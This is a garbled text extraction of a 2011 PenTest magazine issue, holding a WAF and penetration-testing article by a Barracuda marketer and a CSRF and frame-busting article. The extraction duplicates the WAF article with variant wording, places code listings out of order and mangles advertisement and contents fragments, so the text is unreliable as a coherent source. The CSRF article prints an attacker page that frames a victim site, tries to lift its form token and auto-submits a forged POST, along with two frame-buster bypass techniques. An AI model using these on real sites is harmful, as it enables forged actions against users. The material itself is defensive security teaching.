Systems (IDS), a WAF checks the communications at the application level. Normally the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory but actually complement each other. By analogy with air traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which as the first security layer considerably minimizes the risks of attacks on any weak spots.
After introducing a WAF it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be misused by SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application. If a WAF is also deployed as a protective system, then it can be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis; this would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context too, penetration tests make an important contribution to increasing Web Application Security.
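The point that character filtering alone is not enough can be shown in a few lines. The sketch below is a hypothetical illustration (not from the article): stripping inverted commas breaks the classic quote-based payload, but an injection against a numeric parameter needs no quotes at all.

```javascript
// Hypothetical sketch of naive quote filtering, as a WAF rule might do.
function stripQuotes(input) {
  return input.replace(/['"]/g, '');
}

const quoteAttack = "1' OR '1'='1";
console.log(stripQuotes(quoteAttack)); // "1 OR 1=1" -- the quote-based payload is broken
const numericAttack = '1 OR 1=1';      // no quotes: the filter passes it unchanged
console.log(stripQuotes(numericAttack) === numericAttack); // true
```

This is exactly why a WAF rule set has to be derived from an analysis of the application, not from a single character blacklist.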
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes for several web applications. If they are run in redundant mode, they can also perform load balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, the WAFs filter the data flow between the browser and the web application. If an entry pattern emerges here that is defined as invalid, then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration. If, for example, two parameters have been defined for a monitored entry form, then the WAF can block all requests that contain three or more parameters. In this way the length and the contents of parameters can also be checked. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as their maximum length, valid characters and permitted value range.
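The kind of per-form rules described above can be sketched as follows. This is a hypothetical illustration, not a real WAF API; the rule names, limits and character classes are assumptions chosen for the example.

```javascript
// Hypothetical per-form WAF rules: parameter count, maximum length
// and allowed character set per parameter.
const formRules = {
  maxParams: 2,
  params: {
    message: { maxLength: 140, allowed: /^[\w .,!?-]*$/ },
    token:   { maxLength: 32,  allowed: /^[0-9a-f]*$/ },
  },
};

function requestAllowed(params, rules) {
  const names = Object.keys(params);
  if (names.length > rules.maxParams) return false;  // e.g. block 3+ parameters
  return names.every((name) => {
    const rule = rules.params[name];
    if (!rule) return false;                         // unknown parameter
    const value = params[name];
    return value.length <= rule.maxLength && rule.allowed.test(value);
  });
}

console.log(requestAllowed({ message: 'hello', token: 'a1b2' }, formRules)); // true
console.log(requestAllowed({ message: "x' OR '1'='1", token: 'a1b2' }, formRules)); // false
```

Even rules this coarse already stop whole classes of injection payloads before they reach the application.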
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule set for access rates with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks. However, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar. A virus scanner integrated into the WAF checks every file before it is sent to the web application.
Figure 2. An overview of how a Web Application Firewall works.
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can, to a certain extent, automatically prevent malicious code from reaching the browser if, for example, a web application does not conduct sufficient checks of the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning if there are any changes to the application. As a result, whitelist-only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, on the other hand, offers attackers too many loopholes. Consequently, the ideal solution should rely on a combination of both whitelisting and blacklisting. This can be made easy to use by employing templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
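The combined approach described above can be sketched in a few lines. This is a hypothetical illustration, not a real WAF configuration; the patterns and the path of the high-value page are assumptions chosen for the example.

```javascript
// Hypothetical combination of blacklisting and whitelisting:
// a blacklist of known attack patterns applied everywhere, plus a
// strict whitelist for one high-value page.
const blacklist = [/<script/i, /union\s+select/i, /\.\.\//];
const whitelist = { '/order/entry': /^[\w=&.-]*$/ };  // only these characters allowed

function wafAllows(path, query) {
  if (blacklist.some((pattern) => pattern.test(query))) return false;
  const allowed = whitelist[path];
  if (allowed) return allowed.test(query);  // high-value page: whitelist only
  return true;                              // elsewhere: blacklist only
}

console.log(wafAllows('/news', 'id=42'));                      // true
console.log(wafAllows('/news', 'q=1 UNION SELECT password'));  // false
console.log(wafAllows('/order/entry', 'item=3&qty=2'));        // true
console.log(wafAllows('/order/entry', "item=3'--"));           // false
```

The whitelist only has to be maintained for the high-value sub-section, while the blacklist covers the rest of the application at low tuning cost.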
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that possibly violate the policies but can still be categorized as legitimate based on an extensive heuristic analysis. At the same time, the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks, even after the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in line and uses both of the system's physical ports (WAN and LAN). As a proxy, WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. Some special functions are only available here: as a Full Reverse Proxy a WAF provides, for example, Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the rewriting of URLs used by public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to avoid Denial of Service attacks), as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3. A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult.
own IT infrastructure, is the best way to evade the previously mentioned scan attacks, which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But Proxy WAFs must also be configured in line with the respective requirements. Penetration tests help with the correct configuration.
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for distributing and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there at least simple SSL encryption for the data traffic, even if the application or the server does not support this?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate tests.
Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management. In this context the principle of least privilege applies: users are only awarded those privileges needed for their work or the use of the web application; all other privileges are blocked. A general integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively, and are clearly displayed, easy to understand and easy to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products, or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on the known settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (Cum Laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of the PenTest magazine:

• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation, namely in the online gambling industry
• Cyber Security War

Available to download on December 22nd

If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP VULNERABILITIES
Page 34-35, http://pentestmag.com, 01/2011 (1) November
index.php (Victim website)

And the webpage which processes the request and stores the message only if the given token is correct:

post.php (Victim website)

In-depth Analysis

In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4):

index.php (Evil website)

For security reasons, the same-origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:

Permission denied to access property 'document'

var token = window.frames[0].document.forms['messageForm'].token.value;

A browser's settings are not hard to modify, so the best way to achieve web application security is to secure the web application itself.

Frame Busting

The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:
<script type="text/javascript">
if (top != self) top.location.replace(location);
</script>
It consists of a conditional statement and a counter-action statement.

Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
The one-time token is stored in the webpage form's hidden field and in a session at the same time, so that the two can be compared after the form is submitted.

Subverting one-time tokens is usually attempted with brute-force attacks. Brute forcing one-time tokens is worthwhile for an attacker only if the token-generation mechanism is widely used by web developers. For example, the following PHP code:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
Defense Using One-time Tokens

To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).

Listing 2. Wrong token
<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3. Correct token
<?php
session_start();
if ($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, $message . "\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
And the common counter-action statements are these:
top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1:

<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
};
</script>
<iframe src="http://www.good.com"></iframe>
Method 2: Using double framing

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices

And the best example of a FrameKiller is the following:

<style> html { display: none; } </style>
<script>
if (self == top) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>
This protects the web application even if an attacker opens the webpage with JavaScript disabled in the browser.
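The decision the FrameKiller above makes can be factored out into a small, testable function. This is only a sketch; `win` is a stand-in for the browser's `window` object so the logic can be exercised outside a browser:

```javascript
// Sketch: the frame-busting decision, isolated from the DOM.
// 'win' stands in for the browser's window object.
function frameKillerAction(win) {
  // Top-level page: reveal the content hidden by the CSS rule.
  // Framed page: navigate the top frame to ourselves (bust the frame).
  return win.self === win.top ? 'show' : 'bust';
}

console.log(frameKillerAction({ self: 'page', top: 'page' }));  // 'show' - not framed
console.log(frameKillerAction({ self: 'page', top: 'outer' })); // 'bust' - framed
```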
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvelgevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006. He then began seriously learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience shaped Samvel's work ethic: he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has taken his job to a higher level, and he is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29, http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack
<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
    var token = window.frames[0].document.forms['messageForm'].elements['token'].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com">
<input type="hidden" name="token" value="">
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
Page 38-39, http://pentestmag.com, 01/2011 (1) November
First the Security Gate, then the Airplane: What needs to be heeded when checking web applications

Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security, however, is often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone worldwide.

Web applications are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.

In most commercial and non-commercial areas, the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.

A major reason for these rapid developments is the almost unlimited possibilities to simplify, accelerate and make business processes more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of, and more powerful, applications that provide the internet user with the required functions as fast and simply as possible.

Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.

Above all, the common practice of adapting tried and tested technologies for developing web applications without subjecting them to prior security and qualification tests is dangerous. In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.

As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher.

While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field. They now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes it easier to use legitimately, but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and for making actions anonymous. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.

Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular, professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how much they knew.

The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons, for example Ajax and JavaScript, in order to facilitate the interaction in the first place or to make it dynamic. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.

Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of the systems that follow on, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who bear the big responsibility here towards all those who use their applications, and it is one which they often do not fulfill.

Figure 1: This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of a new technology and the securing of that technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire

The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios through which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now, the major types have been:

• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering

The only more recent trend: attackers have recently started to combine these methods more often in order to obtain even higher success rates. And it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.

One Example

Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify, with high efficiency, as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure

There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would have to raise the security of older web applications to the required standards later.

However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that has until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked. It is then not sufficient to just add new functions; the developers must start by precisely analyzing the program and then make deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that do not use more than the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.

If existing web applications display weak spots, and the probability is relatively high, then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can bring clarity on whether and to what extent the problems must be resolved, or if further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.

The situation is not much better with web applications that are to be developed from scratch. There is no software program that ever went into productive operation free of errors or without weak spots. The shortcomings are frequently uncovered only over time, and by then correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code programming that sensibly combines effectiveness, functionality and security still has top priority. The more safely a web application is written, the less improvement work is needed and the less complex the external security measures that have to be adopted.

The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAFs) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast with classic firewalls and Intrusion Detection Systems (IDS), a WAF checks the communications at the application level. Normally, the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory but actually complement each other. Analogous to air traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably minimizes the risks of attacks on any weak spots.
After introducing a WAF, it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be misused via SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application. If a WAF is deployed as a protective system, then it can be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis; this would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing web application security.
WAF Functionality

A major advantage of WAFs is that one single system can close the security loopholes for several web applications. If they are run in redundant mode, they can also perform load balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.

In order to protect the web applications, the WAFs filter the data flow between the browser and the web application. If an entry pattern emerges here that is defined as invalid, then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration. If, for example, two parameters have been defined for a monitored entry form, then the WAF can block all requests that contain three or more parameters. In this way, the length and the contents of parameters can also be checked. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid number of characters and permitted value range.
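The parameter rules just described (expected parameter count, maximum length, permitted characters) can be sketched as a small validation routine. The rule format and field names below are hypothetical and only illustrate the idea, not any vendor's actual configuration:

```javascript
// Sketch: WAF-style parameter validation. Rules per form field:
// expected parameter count, maximum length, allowed character class.
const rules = {
  maxParams: 2,
  fields: {
    message: { maxLen: 200, pattern: /^[\w\s.,!?-]*$/ },
    token:   { maxLen: 32,  pattern: /^[0-9a-f]*$/ },
  },
};

function checkRequest(params, ruleSet) {
  const names = Object.keys(params);
  if (names.length > ruleSet.maxParams) return false; // extra parameters: block
  for (const name of names) {
    const rule = ruleSet.fields[name];
    if (!rule) return false;                          // unknown parameter: block
    const value = String(params[name]);
    if (value.length > rule.maxLen) return false;     // oversized value: block
    if (!rule.pattern.test(value)) return false;      // invalid characters: block
  }
  return true;
}

console.log(checkRequest({ message: 'hello', token: 'abc123' }, rules));      // true
console.log(checkRequest({ message: "' OR 1=1 --", token: 'abc123' }, rules)); // false
```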
Of course, an integrated XML firewall should also be standard these days, because increasingly more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule set for access rates, with finely adjustable guidelines, also eliminates the negative consequences of Denial of Service or brute force attacks. However, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar. A virus scanner integrated into the WAF checks every file before it is sent to the web application.
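The access-rate rule mentioned above, aimed at brute force and Denial of Service attempts, boils down to counting requests per client within a time window. A minimal sliding-window sketch, with invented limits:

```javascript
// Sketch: a per-client access-rate rule of the kind a WAF applies against
// brute-force and Denial of Service attempts (limits are illustrative).
function makeRateLimiter(maxRequests, windowMs) {
  const hits = new Map(); // client -> timestamps of recent requests
  return function allowed(client, now) {
    const recent = (hits.get(client) || []).filter((t) => now - t < windowMs);
    if (recent.length >= maxRequests) {
      hits.set(client, recent);
      return false; // over the limit inside the window: block
    }
    recent.push(now);
    hits.set(client, recent);
    return true;
  };
}

const allowed = makeRateLimiter(3, 1000); // at most 3 requests per second
console.log(allowed('10.0.0.1', 0));  // true
console.log(allowed('10.0.0.1', 10)); // true
console.log(allowed('10.0.0.1', 20)); // true
console.log(allowed('10.0.0.1', 30)); // false - 4th request inside the window
```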
Figure 2: An overview of how a Web Application Firewall works.
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way, these filters can, to a certain extent, automatically prevent malicious code from reaching the browser if, for example, a web application does not conduct sufficient checks of the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning if there are any changes to the application. As a result, whitelist-only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, however, offers attackers too many loopholes. Consequently, the ideal solution should rely on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
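The combined approach described above, a blacklist of known attack signatures plus a whitelist for a high-value page, can be sketched as follows (the patterns and the /order path are invented for illustration):

```javascript
// Sketch: blacklist (negative security profile) combined with a whitelist
// (positive profile) for one high-value path. Patterns are illustrative only.
const blacklist = [/<script/i, /union\s+select/i, /\.\.\//];
const whitelist = { '/order': /^[\w\s@.,-]*$/ }; // strict rule for order entry

function allow(path, input) {
  if (blacklist.some((sig) => sig.test(input))) return false; // known attack
  const rule = whitelist[path];
  if (rule && !rule.test(input)) return false; // outside the learned profile
  return true;
}

console.log(allow('/news', 'hello world'));               // true
console.log(allow('/news', '<script>alert(1)</script>')); // false
console.log(allow('/order', 'John Smith, 3 units'));      // true
```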
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that possibly violate the policies but can still be categorized as legitimate based on an extensive heuristic analysis. At the same time, the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line Bridge Path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks, even if the security checks have been conducted.

The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF has the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. Some special functions are also only available here: as a Full Reverse Proxy, a WAF provides for example Instant SSL, which converts HTTP pages into HTTPS without making changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses and as such the rewriting of URLs, mapping public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster, and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization. Cloaking, the concealment of one's own IT infrastructure, is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and Cookie Security prevents identity theft. But Proxy WAFs must also be configured to correspond with the respective terms; penetration tests help with the correct configuration.

Figure 3: A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult.
Demands on Penetration Testers

When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for transmitting and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:

• Does the system have a Web Application Firewall?
• Does the web traffic occur via a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there a simple SSL encryption for the data traffic, even if the application or the server does not support this?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism examines the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.

Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate tests.

Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management. In this context the principle of least privilege applies: users are only granted those privileges they need for their work or for the use of the web application; all other privileges are blocked. A general integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
